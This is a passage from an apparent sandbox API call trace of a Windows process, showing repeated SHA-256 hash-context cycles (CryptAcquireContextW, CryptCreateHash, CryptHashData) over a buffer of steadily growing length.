pbData=0x32348160, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0189.701] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace970 [0189.701] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0189.701] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0189.701] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338236d0) returned 1 [0189.701] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.701] CryptHashData (hHash=0x3396ef60, pbData=0x32348160, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0189.701] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace9a0 [0189.701] CryptDestroyHash (hHash=0x3396ef60) returned 1 [0189.701] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0189.701] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338231d0) returned 1 [0189.702] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.702] CryptHashData (hHash=0x3396ee80, pbData=0x32348160, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0189.702] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acee20 [0189.702] CryptDestroyHash (hHash=0x3396ee80) returned 1 [0189.702] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0189.702] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822ad0) returned 1 [0189.703] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.703] CryptHashData (hHash=0x3396ee10, pbData=0x32348160, dwDataLen=0x700, dwFlags=0x0) returned 1 [0189.703] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32aceeb0 [0189.703] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0189.703] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0189.703] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822fd0) returned 1 [0189.703] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.703] CryptHashData (hHash=0x3396ee10, pbData=0x32348160, dwDataLen=0x720, dwFlags=0x0) returned 1 [0189.703] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acebe0 [0189.703] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0189.704] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0189.704] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338225d0) returned 1 [0189.704] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.704] CryptHashData (hHash=0x3396efd0, pbData=0x32348160, dwDataLen=0x740, dwFlags=0x0) returned 1 [0189.704] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace3d0 [0189.704] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0189.704] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0189.704] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338229d0) returned 1 [0189.705] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.705] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0x760, dwFlags=0x0) returned 1 [0189.705] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace9d0 [0189.705] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.705] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0189.705] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338225d0) returned 1 [0189.705] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.705] CryptHashData (hHash=0x3396f5f0, pbData=0x32348160, dwDataLen=0x780, dwFlags=0x0) returned 1 [0189.705] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acef40 [0189.706] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0189.706] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0189.706] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822ed0) returned 1 [0189.706] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.706] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0189.706] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32aced60 [0189.706] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0189.706] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0189.706] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338234d0) returned 1 [0189.707] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.707] CryptHashData (hHash=0x3396eb70, pbData=0x32348160, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0189.707] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acee50 [0189.707] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0189.707] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0189.707] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33821dd0) returned 1 [0189.708] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.708] CryptHashData (hHash=0x3396f5f0, pbData=0x32348160, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0189.708] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32aceca0 [0189.708] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0189.708] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0189.708] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338230d0) returned 1 [0189.708] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.708] CryptHashData (hHash=0x3396f5f0, pbData=0x32348160, dwDataLen=0x800, dwFlags=0x0) returned 1 [0189.708] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acea90 [0189.708] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0189.708] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0189.709] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33821fd0) returned 1 [0189.709] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.709] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0x820, dwFlags=0x0) returned 1 [0189.709] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace490 [0189.709] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0189.709] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0189.709] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33821ed0) returned 1 [0189.710] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.710] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0x840, dwFlags=0x0) returned 1 [0189.710] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32aceac0 [0189.710] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.710] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0189.710] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338232d0) returned 1 [0189.711] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.711] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0x860, dwFlags=0x0) returned 1 [0189.711] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32aceee0 [0189.711] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0189.711] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0189.711] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338233d0) returned 1 [0189.711] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.711] CryptHashData (hHash=0x3396ea90, pbData=0x32348160, dwDataLen=0x880, dwFlags=0x0) returned 1 [0189.711] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32aceaf0 [0189.711] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0189.711] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0189.711] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822fd0) returned 1 [0189.712] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.712] CryptHashData (hHash=0x3396ee80, pbData=0x32348160, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0189.712] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace4c0 [0189.712] CryptDestroyHash (hHash=0x3396ee80) returned 1 [0189.712] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0189.712] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338225d0) returned 1 [0189.715] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.715] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0189.715] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32aceb20 [0189.715] CryptDestroyHash (hHash=0x3396f430) returned 1 [0189.715] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0189.715] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338231d0) returned 1 [0189.715] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.715] CryptHashData (hHash=0x3396f190, pbData=0x32348160, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0189.715] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32aceb50 [0189.716] CryptDestroyHash (hHash=0x3396f190) returned 1 [0189.716] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0189.716] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338225d0) returned 1 [0189.716] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.716] CryptHashData (hHash=0x3396ee10, pbData=0x32348160, dwDataLen=0x900, dwFlags=0x0) returned 1 [0189.716] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acebb0 [0189.716] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0189.716] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0189.716] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33823bd0) returned 1 [0189.717] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.717] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0x920, dwFlags=0x0) returned 1 [0189.717] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acec10 [0189.717] CryptDestroyHash (hHash=0x3396f580) returned 1 [0189.717] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0189.717] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338231d0) returned 1 [0189.718] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.718] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0x940, dwFlags=0x0) returned 1 [0189.718] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acedf0 [0189.718] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0189.718] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0189.718] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338233d0) returned 1 [0189.718] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.719] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0x960, dwFlags=0x0) returned 1 [0189.719] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acec40 [0189.719] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.719] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0189.719] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338235d0) returned 1 [0189.719] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.719] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0x980, dwFlags=0x0) returned 1 [0189.719] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32aced90 [0189.719] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0189.719] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0189.719] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33821fd0) returned 1 [0189.720] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.720] CryptHashData (hHash=0x3396efd0, pbData=0x32348160, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0189.720] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acec70 [0189.720] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0189.720] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0189.720] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338225d0) returned 1 [0189.721] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.721] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0189.721] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acef10 [0189.721] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.721] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0189.721] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822cd0) returned 1 [0189.721] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.721] CryptHashData (hHash=0x3396ee80, pbData=0x32348160, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0189.721] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace430 [0189.721] CryptDestroyHash (hHash=0x3396ee80) returned 1 [0189.721] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0189.721] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338239d0) returned 1 [0189.722] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.722] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0189.722] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace4f0 [0189.722] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0189.722] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0189.722] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338220d0) returned 1 [0189.723] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.723] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0189.723] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace520 [0189.723] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0189.723] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0189.723] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822cd0) returned 1 [0189.723] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.723] CryptHashData (hHash=0x3396f350, pbData=0x32348160, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0189.723] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace550 [0189.723] CryptDestroyHash (hHash=0x3396f350) returned 1 [0189.723] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0189.724] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822dd0) returned 1 [0189.724] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.724] CryptHashData (hHash=0x3396ee10, pbData=0x32348160, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0189.724] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace580 [0189.724] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0189.724] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0189.724] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33821fd0) returned 1 [0189.725] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.725] CryptHashData (hHash=0x3396ef60, pbData=0x32348160, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0189.725] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf0c0 [0189.725] CryptDestroyHash (hHash=0x3396ef60) returned 1 [0189.725] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0189.725] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338222d0) returned 1 [0189.725] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.725] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0189.725] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf060 [0189.726] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.726] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0189.726] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33821dd0) returned 1 [0189.726] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.726] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0189.726] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf7b0 [0189.726] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.726] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0189.726] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338239d0) returned 1 [0189.727] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.727] CryptHashData (hHash=0x3396f4a0, pbData=0x32348160, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0189.727] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfab0 [0189.727] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0189.727] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0189.727] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338223d0) returned 1 [0189.728] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.728] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0189.728] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf1b0 [0189.728] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0189.728] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0189.728] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338235d0) returned 1 [0189.728] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.728] CryptHashData (hHash=0x3396f190, pbData=0x32348160, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0189.728] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf240 [0189.728] CryptDestroyHash (hHash=0x3396f190) returned 1 [0189.728] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0189.728] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338225d0) returned 1 [0189.731] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.731] CryptHashData (hHash=0x3396efd0, pbData=0x32348160, dwDataLen=0xb40, dwFlags=0x0) returned 1 [0189.731] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf750 [0189.731] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0189.731] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0189.731] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822dd0) returned 1 [0189.731] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.731] CryptHashData (hHash=0x3396f200, pbData=0x32348160, dwDataLen=0xb60, dwFlags=0x0) returned 1 [0189.731] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf930 [0189.731] CryptDestroyHash (hHash=0x3396f200) returned 1 [0189.731] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0189.731] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338226d0) returned 1 [0189.732] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.732] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0xb80, dwFlags=0x0) returned 1 [0189.732] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acef70 [0189.732] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0189.732] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0189.732] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338221d0) returned 1 [0189.740] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.740] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0xba0, dwFlags=0x0) returned 1 [0189.740] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf630 [0189.740] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0189.740] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0189.740] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: 